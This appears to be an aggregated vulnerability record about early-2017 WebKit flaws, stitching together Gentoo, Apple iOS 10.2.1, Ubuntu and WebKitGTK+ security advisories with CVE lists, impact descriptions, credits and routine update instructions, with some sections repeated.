[ 53 ] CVE-2017-2394
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2394
[ 54 ] CVE-2017-2395
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2395
[ 55 ] CVE-2017-2396
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2396
[ 56 ] CVE-2017-2405
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2405
[ 57 ] CVE-2017-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2415
[ 58 ] CVE-2017-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2419
[ 59 ] CVE-2017-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2433
[ 60 ] CVE-2017-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2442
[ 61 ] CVE-2017-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2445
[ 62 ] CVE-2017-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2446
[ 63 ] CVE-2017-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2447
[ 64 ] CVE-2017-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2454
[ 65 ] CVE-2017-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2455
[ 66 ] CVE-2017-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2457
[ 67 ] CVE-2017-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2459
[ 68 ] CVE-2017-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2460
[ 69 ] CVE-2017-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2464
[ 70 ] CVE-2017-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2465
[ 71 ] CVE-2017-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2466
[ 72 ] CVE-2017-2468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2468
[ 73 ] CVE-2017-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2469
[ 74 ] CVE-2017-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2470
[ 75 ] CVE-2017-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2471
[ 76 ] CVE-2017-2475
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2475
[ 77 ] CVE-2017-2476
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2476
[ 78 ] CVE-2017-2481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2481
[ 79 ] CVE-2017-2496
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2496
[ 80 ] CVE-2017-2504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2504
[ 81 ] CVE-2017-2505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2505
[ 82 ] CVE-2017-2506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2506
[ 83 ] CVE-2017-2508
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2508
[ 84 ] CVE-2017-2510
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2510
[ 85 ] CVE-2017-2514
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2514
[ 86 ] CVE-2017-2515
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2515
[ 87 ] CVE-2017-2521
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2521
[ 88 ] CVE-2017-2525
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2525
[ 89 ] CVE-2017-2526
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2526
[ 90 ] CVE-2017-2528
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2528
[ 91 ] CVE-2017-2530
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2530
[ 92 ] CVE-2017-2531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2531
[ 93 ] CVE-2017-2536
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2536
[ 94 ] CVE-2017-2539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2539
[ 95 ] CVE-2017-2544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2544
[ 96 ] CVE-2017-2547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2547
[ 97 ] CVE-2017-2549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2549
[ 98 ] CVE-2017-6980
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6980
[ 99 ] CVE-2017-6984
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6984
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201706-15
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
--NcNxMnppmhackEL27c23XhPLDAAQ7GQcq--
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-01-23-1 iOS 10.2.1
iOS 10.2.1 is now available and addresses the following:
Auto Unlock
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Auto Unlock may unlock when Apple Watch is off the user's
wrist
Description: A logic issue was addressed through improved state
management.
CVE-2017-2352: Ashley Fernandez of raptAware Pty Ltd
Contacts
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted contact card may lead to
unexpected application termination
Description: An input validation issue existed in the parsing of
contact cards.
CVE-2017-2368: Vincent Desmurs (vincedes3)
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2017-2370: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2360: Ian Beer of Google Project Zero
libarchive
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Unpacking a maliciously crafted archive may lead to arbitrary
code execution
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2016-8687: Agostino Sarubbo of Gentoo
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A prototype access issue was addressed through improved
exception handling.
CVE-2017-2354: Neymar of Tencent's Xuanwu Lab (tencent.com) working
with Trend Micro's Zero Day Initiative
CVE-2017-2362: Ivan Fratric of Google Project Zero
CVE-2017-2373: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory initialization issue was addressed through
improved memory handling.
CVE-2017-2356: Team Pangu and lokihardt at PwnFest 2016
CVE-2017-2366: Kai Kang of Tencent's Xuanwu Lab (tencent.com)
CVE-2017-2369: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: Multiple validation issues existed in the handling of
page loading.
CVE-2017-2363: lokihardt of Google Project Zero
CVE-2017-2364: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A malicious website can open popups
Description: An issue existed in the handling of blocking popups.
CVE-2017-2371: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A validation issue existed in variable handling.
CVE-2017-2365: lokihardt of Google Project Zero
WiFi
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An activation-locked device can be manipulated to briefly
present the home screen
Description: An issue existed with handling user input that caused a
device to present the home screen even when activation locked.
CVE-2017-2351: Sriram (@Sri_Hxor) of Primefort Pvt. Ltd., Hemanth
Joseph
Additional recognition
WebKit hardening
We would like to acknowledge Ben Gras, Kaveh Razavi, Erik Bosman,
Herbert Bos, and Cristiano Giuffrida of the vusec group at
Vrije Universiteit Amsterdam for their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About.
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJYgqLhAAoJEIOj74w0bLRGLBMP/2hLYLM6/FsH/npzPbCouZ3a
7WrIax5GAURyvKmeSHYwbZCyDa+U8RoR83xnm25QxVA0SYiqxYQTLavKkdiwL5dL
QJHtbltb3BWF0ctkcN4q9dvA13kapdn7zr1Zp3MyvnqlsIuo5acsl8DwgNapxklP
6NNgLFuUUPDITMRX+CZlndS3ldas9nWBHGUw7FfVQd7+SCj8+u6CBpVm03SPjC4E
9rObbrDg6Ur7RW8sYz5TvfQ+JfL8ZJQgjCNLE99AV5n+y1SzUaW5+WgklmJzwabm
P6VFCFI3qMctmiHDFh5Ab9eFCspL1ppl8gCj2+eqxCdi9cVPdiOxGUJXkfzUvLCq
d68lHHSasRjoVMacMz9ttpR7IAQpM4L9KYgJ/AbwvOFKn5MkxAJYpbU2DDnlg4UY
ZyZ8CqmIfZoEgDFSx4+LcfNeMoB0f0eDClXzCZkLMqyc7ZhRWcDPO7UTXl2l5IN9
1BoOZJ4AB6unI9/JmTz9x1mkfOMatsz3Mlw2aoqfYqhBYH4IMruIoIx9L7VawxY9
IZM1fJhEc1PejgZ48X95suaGm3LHzSqXo9gIcJ42SEevqFaoD96I5S+D1eeBOIe7
yvyQ8APU6W3io9vlfQG7oW+mtHg0uPJY6yLj+79NpvAeVHrFHi1Am+A/4uuEZLjZ
toC5axX5Dn1ZXgiVJb2H
=6bnQ
-----END PGP SIGNATURE-----
.
===========================================================================
Ubuntu Security Notice USN-3200-1
February 16, 2017
webkit2gtk vulnerabilities
===========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.10
- Ubuntu 16.04 LTS
Summary:
Several security issues were fixed in WebKitGTK+.
Software Description:
- webkit2gtk: Web content engine library for GTK+
Details:
A large number of security issues were discovered in the WebKitGTK+ Web and
JavaScript engines.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 16.10:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.10.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.10.1
Ubuntu 16.04 LTS:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.04.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.04.1
This update uses a new upstream release, which includes additional bug
fixes. After a standard system update you need to restart any applications
that use WebKitGTK+, such as Epiphany, to make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-3200-1
CVE-2017-2350, CVE-2017-2354, CVE-2017-2355, CVE-2017-2356,
CVE-2017-2362, CVE-2017-2363, CVE-2017-2364, CVE-2017-2365,
CVE-2017-2366, CVE-2017-2369, CVE-2017-2371, CVE-2017-2373
Package Information:
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.10.1
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.04.1
| VAR-201702-0877 | CVE-2017-2363 | plural Apple Used in products WebKit Vulnerabilities that bypass the same origin policy |
CVSS V2: 4.3 CVSS V3: 6.5 Severity: MEDIUM |
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. Safari before 10.0.3 is affected. tvOS before 10.1.1 is affected. watchOS before 3.1.3 is affected. The issue involves the "WebKit" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site. WebKit is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass security restrictions; other attacks are also possible. in the United States. Apple iOS is an operating system developed for mobile devices; Safari is a web browser that is the default browser included with Mac OS X and iOS operating systems; tvOS is a smart TV operating system. WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome. A security vulnerability exists in the WebKit component of several Apple products. The following products and versions are affected: Apple iOS prior to 10.2.1; Safari prior to 10.0.3; tvOS prior to 10.1.1; watchOS prior to 3.1.3.
Safari 10.0.3 may be obtained from the Mac App Store. ------------------------------------------------------------------------
WebKitGTK+ Security Advisory WSA-2017-0002
------------------------------------------------------------------------
Date reported : February 10, 2017
Advisory ID : WSA-2017-0002
Advisory URL : https://webkitgtk.org/security/WSA-2017-0002.html
CVE identifiers : CVE-2017-2350, CVE-2017-2354, CVE-2017-2355,
CVE-2017-2356, CVE-2017-2362, CVE-2017-2363,
CVE-2017-2364, CVE-2017-2365, CVE-2017-2366,
CVE-2017-2369, CVE-2017-2371, CVE-2017-2373.
Several vulnerabilities were discovered in WebKitGTK+.
Credit to Gareth Heyes of Portswigger Web Security.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: A prototype access issue was
addressed through improved exception handling.
Credit to Neymar of Tencent's Xuanwu Lab (tencent.com) working with
Trend Micro's Zero Day Initiative.
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: Multiple memory corruption
issues were addressed through improved memory handling.
Credit to Team Pangu and lokihardt at PwnFest 2016.
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: A memory initialization issue
was addressed through improved memory handling.
Credit to Team Pangu and lokihardt at PwnFest 2016.
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to Ivan Fratric of Google Project Zero.
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: Multiple memory corruption
issues were addressed through improved memory handling.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: Multiple validation issues existed
in the handling of page loading. This issue was addressed through
improved logic.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: Multiple validation issues existed
in the handling of page loading. This issue was addressed through
improved logic.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: A validation issue existed in
variable handling. This issue was addressed through improved
validation.
Credit to Kai Kang of Tencent's Xuanwu Lab (tencent.com).
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to Ivan Fratric of Google Project Zero.
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to lokihardt of Google Project Zero.
Impact: A malicious website can open popups. Description: An issue
existed in the handling of blocking popups. This was addressed
through improved input validation.
Credit to Ivan Fratric of Google Project Zero.
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: Multiple memory corruption
issues were addressed through improved memory handling.
We recommend updating to the last stable version of WebKitGTK+. It is
the best way of ensuring that you are running a safe version of
WebKitGTK+. Please check our website for information about the last
stable releases.
Further information about WebKitGTK+ Security Advisories can be found
at: https://webkitgtk.org/security.html
The WebKitGTK+ team,
February 10, 2017
.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WebKitGTK+: Multiple vulnerabilities
Date: June 07, 2017
Bugs: #543650, #573656, #577068, #608958, #614876, #619788
ID: 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in WebKitGTK+, the worst of
which allows remote attackers to execute arbitrary code.
Background
==========
WebKitGTK+ is a full-featured port of the WebKit rendering engine.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.16.3 >= 2.16.3
Description
===========
Multiple vulnerabilities have been discovered in WebKitGTK+. Please
review the CVE identifiers referenced below for details.
Impact
======
A remote attack can use multiple vectors to execute arbitrary code or
cause a denial of service condition.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All WebKitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.16.3:4"
References
==========
[ 1 ] CVE-2015-2330
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2330
[ 2 ] CVE-2015-7096
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7096
[ 3 ] CVE-2015-7098
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7098
[ 4 ] CVE-2016-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1723
[ 5 ] CVE-2016-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1724
[ 6 ] CVE-2016-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1725
[ 7 ] CVE-2016-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1726
[ 8 ] CVE-2016-1727
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1727
[ 9 ] CVE-2016-1728
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1728
[ 10 ] CVE-2016-4692
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4692
[ 11 ] CVE-2016-4743
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4743
[ 12 ] CVE-2016-7586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7586
[ 13 ] CVE-2016-7587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7587
[ 14 ] CVE-2016-7589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7589
[ 15 ] CVE-2016-7592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7592
[ 16 ] CVE-2016-7598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7598
[ 17 ] CVE-2016-7599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7599
[ 18 ] CVE-2016-7610
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7610
[ 19 ] CVE-2016-7611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7611
[ 20 ] CVE-2016-7623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7623
[ 21 ] CVE-2016-7632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7632
[ 22 ] CVE-2016-7635
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7635
[ 23 ] CVE-2016-7639
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7639
[ 24 ] CVE-2016-7640
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7640
[ 25 ] CVE-2016-7641
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7641
[ 26 ] CVE-2016-7642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7642
[ 27 ] CVE-2016-7645
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7645
[ 28 ] CVE-2016-7646
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7646
[ 29 ] CVE-2016-7648
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7648
[ 30 ] CVE-2016-7649
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7649
[ 31 ] CVE-2016-7652
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7652
[ 32 ] CVE-2016-7654
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7654
[ 33 ] CVE-2016-7656
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7656
[ 34 ] CVE-2016-9642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9642
[ 35 ] CVE-2016-9643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9643
[ 36 ] CVE-2017-2350
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2350
[ 37 ] CVE-2017-2354
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2354
[ 38 ] CVE-2017-2355
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2355
[ 39 ] CVE-2017-2356
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2356
[ 40 ] CVE-2017-2362
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2362
[ 41 ] CVE-2017-2363
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2363
[ 42 ] CVE-2017-2364
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2364
[ 43 ] CVE-2017-2365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2365
[ 44 ] CVE-2017-2366
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2366
[ 45 ] CVE-2017-2367
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2367
[ 46 ] CVE-2017-2369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2369
[ 47 ] CVE-2017-2371
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2371
[ 48 ] CVE-2017-2373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2373
[ 49 ] CVE-2017-2376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2376
[ 50 ] CVE-2017-2377
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2377
[ 51 ] CVE-2017-2386
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2386
[ 52 ] CVE-2017-2392
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2392
[ 53 ] CVE-2017-2394
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2394
[ 54 ] CVE-2017-2395
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2395
[ 55 ] CVE-2017-2396
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2396
[ 56 ] CVE-2017-2405
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2405
[ 57 ] CVE-2017-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2415
[ 58 ] CVE-2017-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2419
[ 59 ] CVE-2017-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2433
[ 60 ] CVE-2017-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2442
[ 61 ] CVE-2017-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2445
[ 62 ] CVE-2017-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2446
[ 63 ] CVE-2017-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2447
[ 64 ] CVE-2017-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2454
[ 65 ] CVE-2017-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2455
[ 66 ] CVE-2017-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2457
[ 67 ] CVE-2017-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2459
[ 68 ] CVE-2017-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2460
[ 69 ] CVE-2017-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2464
[ 70 ] CVE-2017-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2465
[ 71 ] CVE-2017-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2466
[ 72 ] CVE-2017-2468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2468
[ 73 ] CVE-2017-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2469
[ 74 ] CVE-2017-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2470
[ 75 ] CVE-2017-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2471
[ 76 ] CVE-2017-2475
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2475
[ 77 ] CVE-2017-2476
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2476
[ 78 ] CVE-2017-2481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2481
[ 79 ] CVE-2017-2496
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2496
[ 80 ] CVE-2017-2504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2504
[ 81 ] CVE-2017-2505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2505
[ 82 ] CVE-2017-2506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2506
[ 83 ] CVE-2017-2508
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2508
[ 84 ] CVE-2017-2510
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2510
[ 85 ] CVE-2017-2514
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2514
[ 86 ] CVE-2017-2515
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2515
[ 87 ] CVE-2017-2521
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2521
[ 88 ] CVE-2017-2525
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2525
[ 89 ] CVE-2017-2526
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2526
[ 90 ] CVE-2017-2528
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2528
[ 91 ] CVE-2017-2530
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2530
[ 92 ] CVE-2017-2531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2531
[ 93 ] CVE-2017-2536
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2536
[ 94 ] CVE-2017-2539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2539
[ 95 ] CVE-2017-2544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2544
[ 96 ] CVE-2017-2547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2547
[ 97 ] CVE-2017-2549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2549
[ 98 ] CVE-2017-6980
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6980
[ 99 ] CVE-2017-6984
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6984
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201706-15
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
--NcNxMnppmhackEL27c23XhPLDAAQ7GQcq--
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-01-23-1 iOS 10.2.1
iOS 10.2.1 is now available and addresses the following:
Auto Unlock
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Auto Unlock may unlock when Apple Watch is off the user's
wrist
Description: A logic issue was addressed through improved state
management.
CVE-2017-2352: Ashley Fernandez of raptAware Pty Ltd
Contacts
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted contact card may lead to
unexpected application termination
Description: An input validation issue existed in the parsing of
contact cards.
CVE-2017-2368: Vincent Desmurs (vincedes3)
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2017-2370: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2360: Ian Beer of Google Project Zero
libarchive
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Unpacking a maliciously crafted archive may lead to arbitrary
code execution
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2016-8687: Agostino Sarubbo of Gentoo
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
